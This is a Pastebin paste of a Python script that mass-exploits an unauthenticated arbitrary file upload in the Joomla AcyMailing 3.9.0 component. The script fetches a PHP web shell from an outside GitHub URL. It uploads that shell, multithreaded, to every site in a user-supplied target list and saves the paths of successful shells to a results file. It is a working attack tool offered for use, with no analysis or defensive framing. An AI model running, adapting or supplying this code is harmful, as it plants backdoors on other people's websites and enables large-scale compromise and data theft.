ToKeiChun

Joomla! ACYMAILING 3.9.0 component - Unauthenticated Arbitrary File Upload

Nov 2nd, 2020 (edited)
179
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Python 3.60 KB | None | 0 0
  1. ## Source : https://pastebin.com/raw/2MwLpvyK
  2. import requests as req
  3. import os
  4. import sys
  5. import json
  6. import urllib3
  7. from multiprocessing import Pool
  8. from multiprocessing.dummy import Pool as ThreadPool
  9. from urllib.parse import urlparse
  10. urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
  11. proxies = {}
  12. #proxies = {
  13. #  'http': 'http://127.0.0.1:8080',
  14. #  'https': 'http://127.0.0.1:8080',
  15. #}
  16. user_agent = {"User-Agent":"Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.111 Safari/537.36"}
  17. shell_content = req.get("https://raw.githubusercontent.com/0x5a455553/MARIJUANA/master/MARIJUANA.php", headers=user_agent).text
  18. def clear():
  19.     linux   = 'clear'
  20.     windows = 'cls'
  21.     os.system([linux, windows][os.name == 'nt'])
  22. def fail(msg):
  23.     error_back = lambda x: "\033[41m\033[97m{}\033[0m\033[0m".format(x)
  24.     print("{} {}".format(error_back("[FAIL]"), msg))
  25. def ok(msg):
  26.     success_back = lambda x: "\033[42m\033[97m{}\033[0m\033[0m".format(x)
  27.     print("{} {}".format(success_back("[OK]"), msg))
  28. def is_json(data):
  29.     try:
  30.       json_object = json.loads(data)
  31.     except ValueError as e:
  32.       return False
  33.     return True
  34. def url_validator(url):
  35.     try:
  36.         result = urlparse(url)
  37.         return all([result.scheme, result.netloc, result.path])
  38.     except:
  39.         return False
  40. def exploit(url):
  41.     url = url.decode()
  42.     data = {}
  43.     data["option"] = "com_acym"
  44.     data["ctrl"] = "frontmails"
  45.     data["task"] = "setNewIconShare"
  46.     data["social"] = "xxxdddshell"
  47.     try:
  48.         r = req.post(url, data=data, files={"file":("lalala.php", shell_content, "text/php")}, proxies=proxies, verify=False, headers=user_agent)
  49.     except KeyboardInterrupt:
  50.         print("EXITING!!!!!!!!!!")
  51.         sys.exit()
  52.     except Exception as e:
  53.         print("[{}] {}".format(url, e))
  54.         return
  55.     if r.status_code == 200:
  56.         response = r.text
  57.         if "xxxdddshell" in response:
  58.             shell_path = False
  59.             if is_json(response):
  60.                 json_url = json.loads(response)
  61.                 if json_url.get("url"):
  62.                     shell_path = "{}.php".format(json_url["url"])
  63.             else:
  64.                 if url_validator(shell_path):
  65.                     shell_path = response
  66.             if shell_path:
  67.                 ok("{} GOTCHAAAAAAA!".format(shell_path))
  68.                 with open("result.txt", "a") as newline:
  69.                     newline.write("{}\n".format(shell_path))
  70.                     newline.close()
  71.             else:
  72.                 fail("{} not uploaded".format(url))
  73.         else:
  74.             fail("{} not uploaded".format(url))
  75.     else:
  76.         fail("{} not uploaded".format(url))
  77.     return
  78. def main():
  79.     clear()
  80.     banner = """
  81.          __n__n__
  82.   .------`-\\00/-'
  83.  /  ##  ## (oo)
  84. / \## __   ./
  85.    |//YY \|/
  86.    |||   |||          ^^^ ^
  87. +---------------------------------------------------------------------------------------------+
  88. | Title          : Joomla! ACYMAILING 3.9.0 component - Unauthenticated Arbitrary File Upload |
  89. | Coder          : s4ndal.py                                                                  |
  90. +---------------------------------------------------------------------------------------------+
  91.    """
  92.     print(banner)
  93.     threads = input("[?] Threads > ")
  94.     list_file = input("[?] List websites file > ")
  95.     print("[!] all result saved in result.txt")
  96.     with open(list_file, "rb") as file:
  97.         lines = [line.rstrip() for line in file]
  98.         th = ThreadPool(int(threads))
  99.         th.map(exploit, lines)
  100. main()
  101.    
Add Comment
Please, Sign In to add comment